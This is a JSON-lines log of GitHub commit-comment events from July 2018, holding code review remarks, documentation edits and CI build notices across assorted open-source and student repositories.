{"id":"7944601021","type":"CommitCommentEvent","actor":{"login":"jacobpennington"},"repo":{"name":"LBHB/nems_db"},"payload":{"comment":{"id":29658598,"position":null,"line":null,"path":null,"commit_id":"c585ef985ce54e40e2002a0ad33984e0e34c5d6c","created_at":"2018-07-10T15:28:59Z","updated_at":"2018-07-10T15:28:59Z","author_association":"CONTRIBUTOR","body":"no problem. i'll just have to roll it back most likely, might need to re-add some stuff if you made any important changes since the initial pull request."}},"created_at":"2018-07-10T15:28:59Z"}
{"id":"7944605615","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29658602,"position":39,"line":39,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T15:29:40Z","updated_at":"2018-07-10T15:29:40Z","author_association":"COLLABORATOR","body":"I was playing with the rules, not sure i have actually seen anything actually match this rule.  I think it needs to be BOE that you already know less than a certain item level.  We need to mess them a bit."}},"created_at":"2018-07-10T15:29:40Z"}
{"id":"7944606093","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29658604,"position":null,"line":null,"path":null,"commit_id":"e3c70f112d42c6692196eda3951727347f051b50","created_at":"2018-07-10T15:29:44Z","updated_at":"2018-07-10T15:29:44Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.43.e3c70f112d42c6692196eda3951727347f051b50](http://build.palaso.org/viewLog.html?buildId=124528&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:53"}},"created_at":"2018-07-10T15:29:44Z"}
{"id":"7944609593","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29658615,"position":null,"line":null,"path":null,"commit_id":"936a1729ab33a4183324323b77844ccadfcbc343","created_at":"2018-07-10T15:30:16Z","updated_at":"2018-07-10T15:30:16Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `2406eabc-8456-11e8-96d3-37750f0679c5`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T15:30:16Z"}
{"id":"7944610026","type":"CommitCommentEvent","actor":{"login":"Reffiel"},"repo":{"name":"Reffiel/teste"},"payload":{"comment":{"id":29658620,"position":null,"line":null,"path":null,"commit_id":"5497127ebeafac64ab13fa6b392611a0b2d926fc","created_at":"2018-07-10T15:30:19Z","updated_at":"2018-07-10T15:30:19Z","author_association":"OWNER","body":"Return initial commit."}},"created_at":"2018-07-10T15:30:19Z"}
{"id":"7944610598","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29658623,"position":72,"line":72,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T15:30:24Z","updated_at":"2018-07-10T15:30:24Z","author_association":"COLLABORATOR","body":"For Custom rules I was thinking so, we could so do it for the system rules, not entirely sure there.  This was mostly in the making it work stages."}},"created_at":"2018-07-10T15:30:24Z"}
{"id":"7944614288","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658633,"position":39,"line":39,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:30:58Z","updated_at":"2018-07-10T15:30:58Z","author_association":"CONTRIBUTOR","body":"Remove \"and usually earlier\" — the grammar is a bit wonky, and besides, it's better to exceed expectations than set them too high :)"}},"created_at":"2018-07-10T15:30:58Z"}
{"id":"7944614360","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658634,"position":null,"line":null,"path":null,"commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:30:58Z","updated_at":"2018-07-10T15:30:58Z","author_association":"NONE","body":"`List.cshtml` : this is perfect, tabels are nice, looks good 👍  Keep this up in the exam as well.\r\nOnly thing I can mention here, that you should commit more, so I can see every change step by step "}},"created_at":"2018-07-10T15:30:58Z"}
{"id":"7944618083","type":"CommitCommentEvent","actor":{"login":"BasilPanda"},"repo":{"name":"BasilPanda/asptree.py"},"payload":{"comment":{"id":29658643,"position":null,"line":null,"path":null,"commit_id":"9bf2b6fdbcaeeb2b0203170fe4331856e20126f0","created_at":"2018-07-10T15:31:33Z","updated_at":"2018-07-10T15:31:33Z","author_association":"OWNER","body":"Originally thought the tree was a prefix tree or trie, but although it is based on prefix trees I do not think it should be called one due to it not having similar functionality to most prefix trees."}},"created_at":"2018-07-10T15:31:33Z"}
{"id":"7944620171","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658673,"position":43,"line":43,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:31:51Z","updated_at":"2018-07-10T15:31:51Z","author_association":"CONTRIBUTOR","body":"The word `its` in the first sentence has an unclear antecedent."}},"created_at":"2018-07-10T15:31:51Z"}
{"id":"7944622300","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29658705,"position":7,"line":7,"path":"kodilla-spring/src/main/java/com/kodilla/spring/forum/ForumUser.java","commit_id":"b376eb940c50217d106e08736d8e0958e68d00dd","created_at":"2018-07-10T15:32:11Z","updated_at":"2018-07-10T15:32:11Z","author_association":"NONE","body":"Pole powinno być prywatne"}},"created_at":"2018-07-10T15:32:11Z"}
{"id":"7944622369","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29658706,"position":189,"line":189,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T15:32:12Z","updated_at":"2018-07-10T15:32:12Z","author_association":"COLLABORATOR","body":"I was thinking that for the system rules, they an on or off type thing, they are different than the custom rules the user won't be able to change them directly (unless of course the mess with the LUA"}},"created_at":"2018-07-10T15:32:12Z"}
{"id":"7944622956","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658716,"position":82,"line":80,"path":"week-08/day-03/ToDOEF/ToDOEF/Controllers/TodoController.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:32:17Z","updated_at":"2018-07-10T15:32:17Z","author_association":"NONE","body":"this is a major issue, please remove all none used code"}},"created_at":"2018-07-10T15:32:17Z"}
{"id":"7944625301","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658750,"position":95,"line":93,"path":"week-08/day-03/ToDOEF/ToDOEF/Controllers/TodoController.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:32:38Z","updated_at":"2018-07-10T15:32:38Z","author_association":"NONE","body":"this is just the tip of the cake, but add new line to the end of each file"}},"created_at":"2018-07-10T15:32:38Z"}
{"id":"7944625498","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658754,"position":13,"line":13,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:32:40Z","updated_at":"2018-07-10T15:32:40Z","author_association":"CONTRIBUTOR","body":"link together"}},"created_at":"2018-07-10T15:32:40Z"}
{"id":"7944625978","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29658765,"position":210,"line":210,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T15:32:45Z","updated_at":"2018-07-10T15:32:45Z","author_association":"COLLABORATOR","body":"Not sure, it perhaps should include the localized name"}},"created_at":"2018-07-10T15:32:45Z"}
{"id":"7944626389","type":"CommitCommentEvent","actor":{"login":"raulvillares"},"repo":{"name":"aleasoluciones/infcommon"},"payload":{"comment":{"id":29658773,"position":null,"line":null,"path":null,"commit_id":"796e54c71153bc420e5be5de95fc843de0cf2cf5","created_at":"2018-07-10T15:32:49Z","updated_at":"2018-07-10T15:32:49Z","author_association":"MEMBER","body":"Que no se nos pase darle una vuelta a la función get_value."}},"created_at":"2018-07-10T15:32:49Z"}
{"id":"7944626435","type":"CommitCommentEvent","actor":{"login":"thevilawyer"},"repo":{"name":"thevilawyer/thevilawyer.github.io"},"payload":{"comment":{"id":29658776,"position":21,"line":44,"path":"_config.yml","commit_id":"b9713b99473171eadf00ebd6d5b75850be1865cd","created_at":"2018-07-10T15:32:49Z","updated_at":"2018-07-10T15:32:49Z","author_association":"OWNER","body":"thevilawyer.github.io"}},"created_at":"2018-07-10T15:32:49Z"}
{"id":"7944627012","type":"CommitCommentEvent","actor":{"login":"acesnik"},"repo":{"name":"smith-chem-wisc/MetaMorpheus"},"payload":{"comment":{"id":29658786,"position":null,"line":null,"path":null,"commit_id":"f7222cdf7c7ba8ca24c637c7ca3d8485517b974f","created_at":"2018-07-10T15:32:55Z","updated_at":"2018-07-10T15:32:55Z","author_association":"MEMBER","body":"I added empty text files for these because of the compile error, so those can be deleted, too."}},"created_at":"2018-07-10T15:32:55Z"}
{"id":"7944627862","type":"CommitCommentEvent","actor":{"login":"prusnak"},"repo":{"name":"trezor/trezor-mcu"},"payload":{"comment":{"id":29658801,"position":45,"line":158,"path":"firmware/stellar.c","commit_id":"520cd69f25e4f34504ea03897ee2b6b3242e75e9","created_at":"2018-07-10T15:33:03Z","updated_at":"2018-07-10T15:33:03Z","author_association":"MEMBER","body":"@zulucrypto I removed `source_account` from all Stellar protobuf messages. The source account is strictly defined by `address_n` in the `StellarSignTx` message, so this info is redundant. However, I see there are two ways how to sign transaction (one with empty source and second with specified source). You wrote unit tests which don't use source, so I use `stellar_hashupdate_bool(false);`, but I would prefer to ALWAYS put source. Is this OK with you? Is there a reason why NOT to put source in the serialized TX?"}},"created_at":"2018-07-10T15:33:03Z"}
{"id":"7944628997","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29658820,"position":225,"line":225,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T15:33:15Z","updated_at":"2018-07-10T15:33:15Z","author_association":"COLLABORATOR","body":"Yes - Certainly for public rules. Not sure we could dig through the interface files."}},"created_at":"2018-07-10T15:33:15Z"}
{"id":"7944629202","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29658823,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T15:33:17Z","updated_at":"2018-07-10T15:33:17Z","author_association":"CONTRIBUTOR","body":"Probably same with `JULIA_PROJECT`."}},"created_at":"2018-07-10T15:33:17Z"}
{"id":"7944630807","type":"CommitCommentEvent","actor":{"login":"sriramkandukuri"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29658824,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-10T15:33:32Z","updated_at":"2018-07-10T15:33:32Z","author_association":"NONE","body":"Hi Michal, Samuel,\r\n\r\nThank you very much for the information, and work around.\r\n"}},"created_at":"2018-07-10T15:33:32Z"}
{"id":"7944631491","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29658825,"position":30,"line":50,"path":"artifacts/mods/gl_partycontrol.ssl","commit_id":"08b5e3a7694159336b9bba2ddb975baac3dca0f6","created_at":"2018-07-10T15:33:38Z","updated_at":"2018-07-10T15:33:38Z","author_association":"COLLABORATOR","body":"You mean like this?\r\n```\r\n      if hasGeckoSkinning then critter_add_trait(critter, TRAIT_PERK, PERK_gecko_skinning_perk, 1);\r\n      move_to(dude_obj, dude_tile, dude_elevation);\r\n   end else begin\r\n      set_dude_obj(real_dude_obj);\r\n      hide_iface_tag(displayName);\r\n      metarule3(METARULE3_TILE_SET_CENTER, dude_tile, dude_elevation, 0);\r\n   end\r\nend\r\n```"}},"created_at":"2018-07-10T15:33:38Z"}
{"id":"7944632392","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29658827,"position":6,"line":6,"path":"kodilla-spring/src/main/java/com/kodilla/spring/calculator/Display.java","commit_id":"44887e17fe04214e136b244f1ee472bb6ea084f5","created_at":"2018-07-10T15:33:47Z","updated_at":"2018-07-10T15:33:47Z","author_association":"NONE","body":"Czemu adnotacja @Repository? Wprowadza w błąd. Powinna być użyta bardziej ogólna adnotacja"}},"created_at":"2018-07-10T15:33:47Z"}
{"id":"7944634176","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658831,"position":2,"line":11,"path":"week-08/day-03/ToDOEF/ToDOEF/Controllers/TodoController.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:34:04Z","updated_at":"2018-07-10T15:34:04Z","author_association":"NONE","body":"Overall the whole backend skeleton is nice, and working as it should"}},"created_at":"2018-07-10T15:34:04Z"}
{"id":"7944638610","type":"CommitCommentEvent","actor":{"login":"Osiris1975"},"repo":{"name":"broadinstitute/widdler"},"payload":{"comment":{"id":29658840,"position":null,"line":null,"path":null,"commit_id":"165e105da2d35928ceec8bf059ed0f1e1f8fd784","created_at":"2018-07-10T15:34:45Z","updated_at":"2018-07-10T15:34:45Z","author_association":"COLLABORATOR","body":"service account json key has been invalidated."}},"created_at":"2018-07-10T15:34:45Z"}
{"id":"7944639519","type":"CommitCommentEvent","actor":{"login":"513494297"},"repo":{"name":"zhwayne/WLButtonCountingDownDemo"},"payload":{"comment":{"id":29658842,"position":null,"line":null,"path":null,"commit_id":"7fe2cf8eb11283f9c10d5f2a883f19a7f9a79a80","created_at":"2018-07-10T15:34:54Z","updated_at":"2018-07-10T15:34:54Z","author_association":"NONE","body":"我就想知道在iOS11上为什么并不是每次都会隐藏overlayLabel，楼主现在解决方法是设置alpha吗"}},"created_at":"2018-07-10T15:34:54Z"}
{"id":"7944639992","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29658844,"position":8,"line":19,"path":"site/database/migrations/2018_07_09_193446_create_perfis_externos_table.php","commit_id":"fd80982ea3767e1178ede9f533cc935e683117c9","created_at":"2018-07-10T15:34:59Z","updated_at":"2018-07-10T15:34:59Z","author_association":"COLLABORATOR","body":"Então o link pode ser null."}},"created_at":"2018-07-10T15:34:59Z"}
{"id":"7944642642","type":"CommitCommentEvent","actor":{"login":"nfultz"},"repo":{"name":"DeclareDesign/DeclareDesign"},"payload":{"comment":{"id":29658848,"position":13,"line":52,"path":"R/simulate_design.R","commit_id":"e65744fbe24ce736e0a2fa2215c901259d8d0b73","created_at":"2018-07-10T15:35:25Z","updated_at":"2018-07-10T15:35:25Z","author_association":"CONTRIBUTOR","body":"!is_bare_integerish."}},"created_at":"2018-07-10T15:35:25Z"}
{"id":"7944646101","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658858,"position":16,"line":25,"path":"week-08/day-03/ToDOEF/ToDOEF/Controllers/TodoController.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:35:58Z","updated_at":"2018-07-10T15:35:58Z","author_association":"NONE","body":"Instead of `[Route]` you could just use `[HttpGet]` attributes, but this is all fine, just a note"}},"created_at":"2018-07-10T15:35:58Z"}
{"id":"7944649397","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29658860,"position":null,"line":null,"path":null,"commit_id":"fd80982ea3767e1178ede9f533cc935e683117c9","created_at":"2018-07-10T15:36:29Z","updated_at":"2018-07-10T15:36:29Z","author_association":"COLLABORATOR","body":"Blz. Hoje saí esse negócio"}},"created_at":"2018-07-10T15:36:29Z"}
{"id":"7944652995","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29658864,"position":null,"line":null,"path":null,"commit_id":"e3c70f112d42c6692196eda3951727347f051b50","created_at":"2018-07-10T15:37:03Z","updated_at":"2018-07-10T15:37:03Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.729.e3c70f112d42c6692196eda3951727347f051b50](http://build.palaso.org/viewLog.html?buildId=124529&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1855, ignored: 18 Build time: 00:08:06"}},"created_at":"2018-07-10T15:37:03Z"}
{"id":"7944654166","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658867,"position":8,"line":8,"path":"week-08/day-03/ToDOEF/ToDOEF/Repositories/IGenericRepository.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:37:14Z","updated_at":"2018-07-10T15:37:14Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-10T15:37:14Z"}
{"id":"7944655464","type":"CommitCommentEvent","actor":{"login":"StefanKarpinski"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29658872,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T15:37:26Z","updated_at":"2018-07-10T15:37:26Z","author_association":"MEMBER","body":"Indeed, although this would only affect things if the process itself spawns yet another process. In which case, what you really want is to set these environment variables in such a way that `LOAD_PATH` is replicated in further children. That should work already as long as none of the paths contain `:` just by doing this:\r\n```jl\r\nENV[\"JULIA_LOAD_PATH\"] = join(map(abspath, Base.load_path()), ':')\r\n```\r\nExcept that it needs the usual `;` if on Windows incantation, which we should probably factor into a helper."}},"created_at":"2018-07-10T15:37:26Z"}
{"id":"7944656621","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/AlexThanasis"},"payload":{"comment":{"id":29658873,"position":2,"line":10,"path":"week-08/day-03/ToDOEF/ToDOEF/Repositories/ToDoDbContext.cs","commit_id":"99f93fb4f03e11433809e48cbeb48510f3fb5ce6","created_at":"2018-07-10T15:37:38Z","updated_at":"2018-07-10T15:37:38Z","author_association":"NONE","body":"all set up, everything is fine"}},"created_at":"2018-07-10T15:37:38Z"}
{"id":"7944659856","type":"CommitCommentEvent","actor":{"login":"smithsp"},"repo":{"name":"gafusion/omas"},"payload":{"comment":{"id":29658878,"position":null,"line":null,"path":null,"commit_id":"32665bebbb0b46bb70c3539767723fbadf6d84c5","created_at":"2018-07-10T15:38:09Z","updated_at":"2018-07-10T15:38:09Z","author_association":"MEMBER","body":"Did this solve the regression test failures?"}},"created_at":"2018-07-10T15:38:09Z"}
{"id":"7944660608","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29658881,"position":44,"line":44,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/library/Library.java","commit_id":"f5f141126f83dba079c2a8c351cc210c867ffd86","created_at":"2018-07-10T15:38:15Z","updated_at":"2018-07-10T15:38:15Z","author_association":"NONE","body":"Trzy linijki wyżej jest użyte cloneLibrary.books, tutaj getter. Powinieneś postępować konsekwentne - jeśli używasz zmiennych to w każdym miejscu w danej metodzie."}},"created_at":"2018-07-10T15:38:15Z"}
{"id":"7944661477","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658885,"position":23,"line":23,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:38:24Z","updated_at":"2018-07-10T15:38:24Z","author_association":"CONTRIBUTOR","body":"The word `It` in the last sentence has an unclear antecedent. Maybe should be something like ... \r\n\r\n> The `log_processing_rules` setting enables the creation of a list containing one or more regular expressions, which instructs the Agent to filter logs based on a whitelist or blacklist."}},"created_at":"2018-07-10T15:38:24Z"}
{"id":"7944661942","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29658887,"position":5,"line":15,"path":"pom.xml","commit_id":"2207d598858c891a41bbbacfefaceabab75e6511","created_at":"2018-07-10T15:38:28Z","updated_at":"2018-07-10T15:38:28Z","author_association":"COLLABORATOR","body":"Ok, I updated the `tag` in this file: https://github.com/jtablesaw/tablesaw/commit/f945e8926ff3e7bc67cb56003d1b8675d9928122\r\n\r\nI was on vacation last week, but it looked like you had solved it by the time I saw your email. If you run `mvn release:prepare` followed by mvn `release:perform` next time around hopefully that will do what you need"}},"created_at":"2018-07-10T15:38:28Z"}
{"id":"7944666260","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658894,"position":27,"line":27,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:39:09Z","updated_at":"2018-07-10T15:39:09Z","author_association":"CONTRIBUTOR","body":"See previous comment about \"it is a list\""}},"created_at":"2018-07-10T15:39:09Z"}
{"id":"7944666962","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29658899,"position":115,"line":92,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:39:15Z","updated_at":"2018-07-10T15:39:15Z","author_association":"NONE","body":"for DMA write, it must call _FinishFrame(), otherwise there is a potential to have coherency problem with the meta-data, when the written frame is used immediately by another subsystem as the frame is passed from one subsystem to another."}},"created_at":"2018-07-10T15:39:15Z"}
{"id":"7944671526","type":"CommitCommentEvent","actor":{"login":"TeamDman"},"repo":{"name":"WayofTime/BloodMagic"},"payload":{"comment":{"id":29658912,"position":null,"line":null,"path":null,"commit_id":"47b88b95b0f395387dc6a5d7f36041a43bb7a6e2","created_at":"2018-07-10T15:39:56Z","updated_at":"2018-07-10T15:39:56Z","author_association":"NONE","body":"A potential performance improvement (?) would be to have a 'lifetime' value on tickets, representing the amount of times to perform the syphon operation. A ritual would make a ticket with something like -1 lifetime, representing a constant operation, while something like using an air sigil would have a ticket lifetime of 1 operation. Some sort of caching method would be used instead of having rituals constantly creating tickets, because they would only need one 'limitless' ticket that should not be removed from the ticket drain queue.\r\n\r\nJust thoughts while the system is in early stages."}},"created_at":"2018-07-10T15:39:56Z"}
{"id":"7944671553","type":"CommitCommentEvent","actor":{"login":"lundibundi"},"repo":{"name":"hovancik/stretchly"},"payload":{"comment":{"id":29658913,"position":13,"line":38,"path":"package.json","commit_id":"3dc28c5fa658a49efe84aae6b64fef5299701288","created_at":"2018-07-10T15:39:57Z","updated_at":"2018-07-10T15:39:57Z","author_association":"CONTRIBUTOR","body":"Is this okay that this commit changed all versions from 'latest-compatible' to 'exact this' version (see [npm doc](https://docs.npmjs.com/files/package.json#dependencies))?"}},"created_at":"2018-07-10T15:39:57Z"}
{"id":"7944672010","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29658916,"position":105,"line":82,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:40:01Z","updated_at":"2018-07-10T15:40:01Z","author_association":"NONE","body":"from the design doc, still don't see the need....lets talk about it"}},"created_at":"2018-07-10T15:40:01Z"}
{"id":"7944674978","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29658973,"position":58,"line":45,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:40:29Z","updated_at":"2018-07-10T15:40:29Z","author_association":"NONE","body":"please check this 2 issues...."}},"created_at":"2018-07-10T15:40:29Z"}
{"id":"7944680249","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29659070,"position":158,"line":124,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:41:17Z","updated_at":"2018-07-10T15:41:17Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-10T15:41:17Z"}
{"id":"7944681140","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29659083,"position":null,"line":null,"path":null,"commit_id":"03f484017b9a32f4ed8ee690bd061be217e74106","created_at":"2018-07-10T15:41:24Z","updated_at":"2018-07-10T15:41:24Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.46.03f484017b9a32f4ed8ee690bd061be217e74106](http://build.palaso.org/viewLog.html?buildId=124530&buildTypeId=HearThis_HearThisPullRequests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:12"}},"created_at":"2018-07-10T15:41:24Z"}
{"id":"7944686859","type":"CommitCommentEvent","actor":{"login":"marcusmaday"},"repo":{"name":"DanElbert/dungeon"},"payload":{"comment":{"id":29659118,"position":null,"line":null,"path":null,"commit_id":"fe4011f141179b8a17bfb0de8d2c6351477f1760","created_at":"2018-07-10T15:42:18Z","updated_at":"2018-07-10T15:42:18Z","author_association":"COLLABORATOR","body":"Yeaaaa, adding traefik!"}},"created_at":"2018-07-10T15:42:18Z"}
{"id":"7944691479","type":"CommitCommentEvent","actor":{"login":"edwinreyes2018"},"repo":{"name":"edwinreyes2018/super-duper-fiesta"},"payload":{"comment":{"id":29659125,"position":1,"line":1,"path":"README.md","commit_id":"79a7b8bbd5f0f61a8e2ab64dfcc6267ef921d21a","created_at":"2018-07-10T15:43:03Z","updated_at":"2018-07-10T15:43:03Z","author_association":"OWNER","body":"icommit"}},"created_at":"2018-07-10T15:43:03Z"}
{"id":"7944691780","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29659127,"position":199,"line":149,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:43:06Z","updated_at":"2018-07-10T15:43:06Z","author_association":"NONE","body":"yes, but do you need both in this api? or just having the DMA engine is enough (can figure out the associated virtual engine)?"}},"created_at":"2018-07-10T15:43:06Z"}
{"id":"7944692843","type":"CommitCommentEvent","actor":{"login":"hovancik"},"repo":{"name":"hovancik/stretchly"},"payload":{"comment":{"id":29659128,"position":13,"line":38,"path":"package.json","commit_id":"3dc28c5fa658a49efe84aae6b64fef5299701288","created_at":"2018-07-10T15:43:15Z","updated_at":"2018-07-10T15:43:15Z","author_association":"OWNER","body":"Yeah, we were discussing this with my RGSoC team and also at #267. Seems that best way is to use exact versions. "}},"created_at":"2018-07-10T15:43:15Z"}
{"id":"7944693069","type":"CommitCommentEvent","actor":{"login":"edwinreyes2018"},"repo":{"name":"edwinreyes2018/super-duper-fiesta"},"payload":{"comment":{"id":29659129,"position":3,"line":1,"path":"README.md","commit_id":"79a7b8bbd5f0f61a8e2ab64dfcc6267ef921d21a","created_at":"2018-07-10T15:43:18Z","updated_at":"2018-07-10T15:43:18Z","author_association":"OWNER","body":"2coomt"}},"created_at":"2018-07-10T15:43:18Z"}
{"id":"7944694284","type":"CommitCommentEvent","actor":{"login":"edwinreyes2018"},"repo":{"name":"edwinreyes2018/super-duper-fiesta"},"payload":{"comment":{"id":29659132,"position":3,"line":1,"path":"README.md","commit_id":"79a7b8bbd5f0f61a8e2ab64dfcc6267ef921d21a","created_at":"2018-07-10T15:43:29Z","updated_at":"2018-07-10T15:43:29Z","author_association":"OWNER","body":"3coomit"}},"created_at":"2018-07-10T15:43:29Z"}
